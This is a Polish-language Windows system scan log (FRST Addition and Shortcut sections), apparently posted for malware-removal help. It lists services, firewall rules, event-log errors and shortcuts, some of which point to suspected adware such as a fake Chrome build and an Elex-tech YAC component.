2017-03-01 12:23 - 2017-03-01 12:23 - 00015064 _____ () C:\WINDOWS\assembly\GAC_MSIL\MyService\1.0.0.1__2dfa3f50f0bed57d\MyService.dll
2016-08-30 16:09 - 2016-08-30 16:09 - 00013016 _____ () C:\Program Files (x86)\Acer\AOP Framework\ServiceInterface.dll
2016-08-30 16:05 - 2016-08-30 16:05 - 00277856 _____ () C:\Program Files (x86)\Acer\AOP Framework\libcurl.dll
2015-10-15 20:56 - 2015-10-15 20:56 - 00201568 _____ () C:\Program Files (x86)\Acer\Acer Portal\curllib.dll
2015-10-15 20:56 - 2015-10-15 20:56 - 00118112 _____ () C:\Program Files (x86)\Acer\Acer Portal\OpenLDAP.dll
2015-06-24 10:07 - 2015-06-24 10:07 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)


==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service"

==================== Powiązania plików (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)

HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Software\Classes\regfile: regedit.exe "%1" <===== UWAGA

==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)

IE trusted site: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\amazon.com -> hxxps://amazon.com

==================== Hosts - zawartość: ===============================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2015-10-30 09:24 - 2017-04-02 23:15 - 00000861 ____A C:\WINDOWS\system32\Drivers\etc\hosts


0.0.0.1   mssplus.mcafee.com

==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Control Panel\Desktop\\Wallpaper -> c:\users\emil\desktop\zdjęcia\12986483_239163373105190_1185582304_o.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Zapora systemu Windows [funkcja włączona]

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==


==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{039F9D25-EDED-4A9C-AFD7-90C3534D04D7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{A5AA757B-C1ED-415E-B787-E6597951AAF3}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{810A60AD-44F4-4F17-9132-22232C1EB2C0}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{7043FAFD-2A69-4C74-AE52-CAB07337CEA0}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{D7797A0C-546C-40A8-A74C-C3136A9DCEC1}] => (Allow) C:\Program Files (x86)\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{156EBC91-05C9-4005-ABAA-ADD491A4DFF7}] => (Allow) C:\Program Files (x86)\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{1BAA21A8-62F1-429A-A534-6FB086F6A8CE}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{5572CBD3-1CFB-455F-A0E2-F30F3F62D4F2}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{6543267D-1115-4370-88BA-8201E35D9E99}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{017CF767-CC24-4E73-BBD6-6E7CE50E903B}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe
FirewallRules: [{901B8B67-32E1-4EF7-88E2-279458BF1BEC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
FirewallRules: [{ACDC2F93-9B31-454B-9D25-60799B38D0C3}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe
FirewallRules: [{63DE445A-8D50-45A0-87C4-466E80F0D8DC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{970183A0-20DE-4C83-96BC-24E4E922C0DD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{B5C306DD-2D57-4E2F-9637-133F7789618D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{283B4201-DE50-4D62-8CE3-F4E18B6D5894}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{58191D1B-321C-4F84-A3B0-7DB904A1E136}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{2A8FFF8B-D136-4CA3-ABCF-05D170B4D642}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{78B9D49C-ECF2-4D85-B090-3E9A79E801DA}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe
FirewallRules: [{4FBCDDD8-C04A-4986-BD2B-DC00A2443DE1}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe
FirewallRules: [{A76AF19C-95BD-4659-B2FE-B5E2E23C6E3B}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe
FirewallRules: [{E7171E90-6D8C-47E8-9C77-E1BBE2ECB2E0}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe
FirewallRules: [{90F8E26B-FFAC-41AA-9EB1-FED13BC6A443}] => (Allow) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe
FirewallRules: [{3C2C53B6-E8E1-4E28-9417-E9EC2D793987}] => (Allow) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe
FirewallRules: [{53BA646B-5112-43D4-BCA2-DFE1B3F6D2D3}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{9C35B053-0376-4B18-BE87-98ECC0964784}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5885212C-9E2A-436F-BD66-E0DBFB01798E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4E38067E-4FEA-487B-9F1D-EFAAB159EA77}] => (Allow) C:\Users\Emil\AppData\Local\Programs\Opera\44.0.2510.23876\opera.exe
FirewallRules: [{F7732D69-5F2B-49EF-A088-0C5F55CD4590}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmq01abd100_46unp9zutxx46unp9zut.dat
FirewallRules: [{250D5170-77A3-49BE-A6F9-959AEB7F445C}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmq01abd100_46unp9zutxx46unp9zut.dat
FirewallRules: [{4898AC23-F455-499C-9159-EC4048145DCF}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [{6B452E6C-FC12-4789-8ECD-60201D3B8758}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{D0DF2BF7-4CE5-494A-9206-37D9BFD681A1}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe

==================== Punkty Przywracania systemu =========================

UWAGA: Przywracanie systemu jest wyłączone

==================== Wadliwe urządzenia w Menedżerze urządzeń =============


==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (04/19/2017 07:47:44 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Nie powiodło się wykonanie procedury otwierania dla usługi „BITS” w bibliotece DLL „C:\Windows\System32\bitsperf.dll”. Dane wydajności dla tej usługi nie będą dostępne. Pierwsze cztery bajty (DWORD) sekcji danych Data zawierają kod błędu.

Error: (04/19/2017 07:38:47 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program explorer.exe w wersji 10.0.14393.953 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania.

Identyfikator procesu: 18f0

Godzina rozpoczęcia: 01d2b9322d15ccbe

Godzina zakończenia: 0

Ścieżka aplikacji: C:\Windows\explorer.exe

Identyfikator raportu: d3286915-2525-11e7-9dce-54ab3abfe915

Pełna nazwa pakietu powodującego błąd:

Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/19/2017 07:33:23 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-PH67M221)
Description: Aktywacja aplikacji Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy!App nie powiodła się. Błąd: -2147023170. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa.

Error: (04/19/2017 07:33:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: BackgroundTaskHost.exe, wersja: 10.0.14393.0, sygnatura czasowa: 0x57899bb2
Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 10.0.14393.1066, sygnatura czasowa: 0x58d9ef32
Kod wyjątku: 0x00000004
Przesunięcie błędu: 0x0000000000033c58
Identyfikator procesu powodującego błąd: 0x192c
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2b9330319235c
Ścieżka aplikacji powodującej błąd: C:\WINDOWS\System32\BackgroundTaskHost.exe
Ścieżka modułu powodującego błąd: C:\WINDOWS\System32\KERNELBASE.dll
Identyfikator raportu: f280556d-d78a-45e7-9f06-92123b890928
Pełna nazwa pakietu powodującego błąd: Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy
Identyfikator aplikacji względem pakietu powodującego błąd: App

Error: (04/19/2017 07:30:13 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-PH67M221)
Description: Aktywacja aplikacji windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel nie powiodła się. Błąd: -2144927142. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa.

Error: (04/19/2017 07:29:04 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: mbamservice.exe, wersja: 3.1.0.415, sygnatura czasowa: 0x5881b7a1
Nazwa modułu powodującego błąd: ntdll.dll, wersja: 10.0.14393.479, sygnatura czasowa: 0x5825887f
Kod wyjątku: 0xc0000005
Przesunięcie błędu: 0x0000000000035793
Identyfikator procesu powodującego błąd: 0x25f8
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2b932682fb39d
Ścieżka aplikacji powodującej błąd: C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
Ścieżka modułu powodującego błąd: C:\WINDOWS\SYSTEM32\ntdll.dll
Identyfikator raportu: 51c6f169-46bf-41be-9500-206cba3b4a11
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/19/2017 07:27:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: mbamservice.exe, wersja: 3.1.0.415, sygnatura czasowa: 0x5881b7a1
Nazwa modułu powodującego błąd: ntdll.dll, wersja: 10.0.14393.479, sygnatura czasowa: 0x5825887f
Kod wyjątku: 0xc0000005
Przesunięcie błędu: 0x0000000000035793
Identyfikator procesu powodującego błąd: 0x9c8
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2b9320ee7896b
Ścieżka aplikacji powodującej błąd: C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
Ścieżka modułu powodującego błąd: C:\WINDOWS\SYSTEM32\ntdll.dll
Identyfikator raportu: e67eb0b7-28b2-4090-ac7c-e6007aa5fb2e
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/19/2017 06:44:19 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-PH67M221)
Description: Aktywacja aplikacji Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy!App nie powiodła się. Błąd: -2144927142. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa.

Error: (04/19/2017 06:44:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: BackgroundTaskHost.exe, wersja: 10.0.14393.0, sygnatura czasowa: 0x57899bb2
Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 10.0.14393.1066, sygnatura czasowa: 0x58d9ef32
Kod wyjątku: 0x00000004
Przesunięcie błędu: 0x0000000000033c58
Identyfikator procesu powodującego błąd: 0x1a84
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2b92c27810004
Ścieżka aplikacji powodującej błąd: C:\WINDOWS\System32\BackgroundTaskHost.exe
Ścieżka modułu powodującego błąd: C:\WINDOWS\System32\KERNELBASE.dll
Identyfikator raportu: b3970176-c4f6-479f-86ce-30eaf0578ab9
Pełna nazwa pakietu powodującego błąd: Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy
Identyfikator aplikacji względem pakietu powodującego błąd: App

Error: (04/19/2017 06:36:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: mbamservice.exe, wersja: 3.1.0.415, sygnatura czasowa: 0x5881b7a1
Nazwa modułu powodującego błąd: ntdll.dll, wersja: 10.0.14393.479, sygnatura czasowa: 0x5825887f
Kod wyjątku: 0xc0000005
Przesunięcie błędu: 0x000000000002f7db
Identyfikator procesu powodującego błąd: 0x26ac
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2b92aa85c4c14
Ścieżka aplikacji powodującej błąd: C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
Ścieżka modułu powodującego błąd: C:\WINDOWS\SYSTEM32\ntdll.dll
Identyfikator raportu: bffe3b5e-d00a-4f69-8b2a-cd95c441f916
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:


Dziennik System:
=============
Error: (04/19/2017 07:29:10 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Usługa Malwarebytes Service niespodziewanie zakończyła pracę. Wystąpiło to razy: 2.

Error: (04/19/2017 07:29:05 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID
{3185A766-B338-11E4-A71E-12E3F512A338}
i identyfikatorem aplikacji APPID
{7006698D-2974-4091-A424-85DD0B909E23}
użytkownikowi ZARZĄDZANIE NT\USŁUGA LOKALNA o identyfikatorze zabezpieczeń SID (S-1-5-19) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (04/19/2017 07:28:51 PM) (Source: DCOM) (EventID: 10010) (User: LAPTOP-PH67M221)
Description: Serwer {0002DF01-0000-0000-C000-000000000046} nie zarejestrował się w modelu DCOM w wymaganym czasie.

Error: (04/19/2017 07:28:09 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Usługa Malwarebytes Service niespodziewanie zakończyła pracę. Wystąpiło to razy: 1.

Error: (04/19/2017 07:27:37 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
i identyfikatorem aplikacji APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (04/19/2017 07:27:32 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi Usługa buforowania czcionek platformy Windows Presentation Foundation, wersja 3.0.0.0 z powodu następującego błędu:
Usługa nie odpowiada na sygnał uruchomienia lub sygnał sterujący w oczekiwanym czasie.

Error: (04/19/2017 07:27:32 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą FontCache3.0.0.0.

Error: (04/19/2017 07:24:55 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
i identyfikatorem aplikacji APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (04/19/2017 06:45:37 PM) (Source: DCOM) (EventID: 10016) (User: LAPTOP-PH67M221)
Description: Zgodnie z ustawieniami uprawnienia domyślne ustawienia komputera nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
i identyfikatorem aplikacji APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
użytkownikowi LAPTOP-PH67M221\Emil o identyfikatorze zabezpieczeń SID (S-1-5-21-2400838556-3398951076-1685541893-1001) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy (S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (04/19/2017 06:44:35 PM) (Source: DCOM) (EventID: 10016) (User: LAPTOP-PH67M221)
Description: Zgodnie z ustawieniami uprawnienia domyślne ustawienia komputera nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
i identyfikatorem aplikacji APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
użytkownikowi LAPTOP-PH67M221\Emil o identyfikatorze zabezpieczeń SID (S-1-5-21-2400838556-3398951076-1685541893-1001) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy (S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.


CodeIntegrity:
===================================
  Date: 2017-04-19 18:41:28.827
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-04-19 18:18:25.330
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-19 17:32:36.654
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-18 15:02:54.329
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-18 11:40:53.160
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-18 11:00:34.184
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-17 18:38:41.937
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-14 15:06:23.049
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\nvacwu.inf_amd64_bdd6ea477d4e2fba\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-04-13 23:58:12.630
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\nvacwu.inf_amd64_bdd6ea477d4e2fba\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-04-13 00:08:32.545
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\nvacwu.inf_amd64_bdd6ea477d4e2fba\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Statystyki pamięci ===========================

Procesor: Intel(R) Core(TM) i3-5005U CPU @ 2.00GHz
Procent pamięci w użyciu: 84%
Całkowita pamięć fizyczna: 4010.45 MB
Dostępna pamięć fizyczna: 627.5 MB
Całkowita pamięć wirtualna: 5194.36 MB
Dostępna pamięć wirtualna: 959.48 MB

==================== Dyski ================================

Drive c: (Acer) (Fixed) (Total:930.4 GB) (Free:788.72 GB) NTFS

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 06CA8F95)

Partition: GPT.

==================== Koniec  Addition.txt ============================


SHORTCUT

Kod: Zaznacz wszystko
Rezultat skanowania skrótów użytkowników (x64) Wersja: 17-04-2017 01
Uruchomiony przez Emil (19-04-2017 19:49:54)
Uruchomiony z C:\Users\Emil\Downloads
Tryb startu: Normal

==================== Skróty =============================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)





Shortcut: C:\ProgramData\{E4FEB43E-F69B-4D80-8F7F-D58114A44D4B}\DashlaneUpgradeInstaller.lnk ->
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\01 - File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\03 - Documents.lnk -> C:\Users\Emil\Documents ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\04 - Downloads.lnk -> C:\Users\Emil\Downloads ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\05 - Music.lnk -> C:\Users\Emil\Music ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\06 - Pictures.lnk -> C:\Users\Emil\Pictures ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\07 - Videos.lnk -> C:\Users\Emil\Videos ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\08 - Homegroup.lnk -> Microsoft.Windows.Homegroup
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\09 - Network.lnk -> Microsoft.Windows.Network
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\10 - UserProfile.lnk -> C:\Users\Emil ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\ScreenShot.lnk -> C:\Program Files (x86)\ScreenShot\ScreenShot.exe (Filseclab Corporation Limited)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk -> C:\Windows\Installer\{AC76BA86-7AD7-1045-7B44-A95000000001}\SC_Reader.ico ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AmazonAssistant.lnk -> C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantTaskbar.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Farming Simulator 17.lnk -> C:\Program Files\Farming Simulator 17\x64\FarmingSimulator2017Game.exe (GIANTS Software GmbH)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Brak pliku)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Immersive Control Panel.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MiracastView.lnk -> C:\Windows\MiracastView\MiracastView.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE (Microsoft Corporation)
